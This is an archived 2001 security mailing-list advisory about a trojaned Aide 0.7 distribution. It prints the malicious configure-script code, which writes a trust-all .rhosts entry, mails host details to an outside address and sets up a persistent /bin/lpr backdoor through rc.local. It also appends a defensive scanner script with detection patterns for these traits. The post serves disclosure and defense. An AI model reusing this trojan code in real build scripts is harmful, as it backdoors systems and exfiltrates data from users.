Security Incidents mailing list archives

Trojan in Aide distribution at ftp.linux.hr


From: Rami Lehti <Rami.Lehti () finland sun com>
Date: 07 Aug 2001 09:45:42 +0300


It has come to my attention that there has been a trojaned
Aide distribution at ftp://ftp.linux.hr/pub/aide.
The offending binary has been removed.
Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to
download it from ftp://ftp.cs.tut.fi/pub/src/gnu
and always check the PGP signature before using any distribution of
Aide.

The trojaned distribution contains the following script embedded in
the configure script. As you can see, it tries to add "+ +" to root's
.rhosts and sends information about your host to l4m0r () freebox com.


# checking if we are root or not
if [ `whoami` == "root" ];then
root_user=1
else
root_user=0
fi

And later on:
if [ $root_user != "1" ];then 
echo "+ +" > ~/.rhosts
echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >/tmp/jea
mail l4m0r () freebox com < /tmp/jea
rm -rf /tmp/jea
else
if [ `uname -s` != Linux ];then
echo ""
else
mv -f .xinitrc /bin/lpr
echo "# printing status monitor" >> /etc/rc.d/rc.local
echo "/bin/lpr &" >> /etc/rc.d/rc.local
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail l4m0r () freebox com < /tmp/jea
/bin/lpr &
rm -rf /tmp/jea
fi
fi



Rami Lehti
-- 
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
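A defender-side check, added here as an example and not part of the original post or of the AIDE project: it scans a configure script for the four behaviours the quoted trojan shows (trust-all .rhosts entry, rc.local persistence, mailing host data out, dropping a file into /bin) and looks for the traces it leaves on a host. File paths and the sample fragment in demo are assumptions constructed for illustration.

```shell
# scan_configure FILE: flag lines matching the trojan's behaviours.
# Returns 0 if nothing matched, 1 if at least one pattern hit.
scan_configure() {
    f="$1"; hits=0
    for pat in '\+ \+.*\.rhosts' \
               '>> */etc/rc\.d/rc\.local' \
               '^[^#]*mail .*< */tmp/' \
               'mv -f .* /bin/'; do
        # -n prints the line number so each hit can be inspected by hand
        if grep -n -E "$pat" "$f" 2>/dev/null; then
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# check_host RHOSTS RCLOCAL: look for the traces the trojan leaves behind.
# Paths are parameters (assumption) so copies or chroots can be checked too.
check_host() {
    rhosts="$1"; rclocal="$2"; found=0
    if [ -f "$rhosts" ] && grep -q -x '+ +' "$rhosts"; then
        echo "trust-all entry in $rhosts"; found=1
    fi
    if [ -f "$rclocal" ] && grep -q -E '^/bin/lpr &|printing status monitor' "$rclocal"; then
        echo "trojan start-up line in $rclocal"; found=1
    fi
    return "$found"
}

# demo: run the scanner over a constructed configure fragment (sample input,
# not the real trojaned file) and report the verdict; returns the scanner's status.
demo() {
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
if [ $root_user != "1" ];then
echo "+ +" > ~/.rhosts
mail someone@example.invalid < /tmp/jea
fi
EOF
    scan_configure "$tmp"; rc=$?
    rm -f "$tmp"
    if [ "$rc" -eq 0 ]; then echo "clean"; else echo "SUSPICIOUS"; fi
    return "$rc"
}
```

On a real tree the calls are `scan_configure ./aide-0.7/configure` and `check_host /root/.rhosts /etc/rc.d/rc.local`; a non-zero status from either means inspect before installing.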

